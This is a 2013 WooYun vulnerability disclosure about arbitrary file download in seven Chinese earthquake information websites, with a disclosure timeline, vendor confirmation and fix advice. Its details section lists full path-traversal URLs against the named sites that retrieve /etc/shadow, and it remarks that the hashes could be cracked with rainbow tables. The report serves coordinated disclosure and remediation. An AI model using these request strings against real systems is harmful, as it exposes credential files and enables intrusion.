漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-025698
漏洞标题:一批国家级和省级地震信息网任意文件下载,个个能下/etc/shadow
相关厂商:国家级和省级地震信息网
漏洞作者: 小点兵
提交时间:2013-06-12 17:39
修复时间:2013-07-27 17:40
公开时间:2013-07-27 17:40
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-06-12: 细节已通知厂商并且等待厂商处理中
2013-06-16: 厂商已经确认,细节仅向厂商公开
2013-06-26: 细节向核心白帽子及相关领域专家公开
2013-07-06: 细节向普通白帽子公开
2013-07-16: 细节向实习白帽子公开
2013-07-27: 细节向公众公开
简要描述:
一批国家级和省级地震信息网任意文件下载,个个能下/etc/shadow。这些漏洞有黑名单过滤脚本下载(不能下载.jsp文件),但是难道shadow和passwd文件没有jsp文件重要么?建议不要用黑名单,太容易被绕过了
详细说明:
国家级:
中国地震信息网:http://www.csi.ac.cn
漏洞点:http://www.csi.ac.cn/manage/content/docmanage/download.jsp?filePath=/../../../../etc/shadow
中国地震局地震预测研究所:http://www.seis.ac.cn
漏洞点:http://www.seis.ac.cn/manage/content/docmanage/download.jsp?filePath=/ycszsxx/../../../../../etc/shadow
省级:
黑龙江地震信息网:http://www.eq-hl.com
漏洞点:http://www.eq-hl.com/manage/content/docmanage/download.jsp?filePath=/rsc/../../../../../etc/shadow
新疆地震信息网:http://www.eq-xj.gov.cn
漏洞点:http://www.eq-xj.gov.cn/manage/content/docmanage/download.jsp?filePath=/rsjy/2013/../../../../../../etc/shadow
云南防震减灾网:http://www.eqyn.com
漏洞点: http://www.eqyn.com/manage/content/docmanage/download.jsp?filePath=/zhfy/../../../../../etc/shadow
宁夏地震信息网:http://www.nx.earthquake.cn
漏洞点: http://www.nx.earthquake.cn/manage/content/docmanage/download.jsp?filePath=/files/../../../../../etc/shadow
山东省防震减灾信息网:http://www.eqsd.gov.cn
漏洞点:http://www.eqsd.gov.cn/manage/content/docmanage/download.jsp?filePath=/../../../../etc/shadow
漏洞证明:
中国地震信息网的/etc/shadow
这些shadow文件有被破解可能。由于我的机器运算能力和内存有限,就不破解了。估计用彩虹表破解花不了多少时间:-)
修复方案:
白名单过滤,黑名单太容易被绕过了
特别注意,中国地震信息网和中国地震局地震预测研究所对外开放ssh端口,建议关闭
版权声明:转载请注明来源 小点兵@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-06-16 21:50
厂商回复:
最新状态:
暂无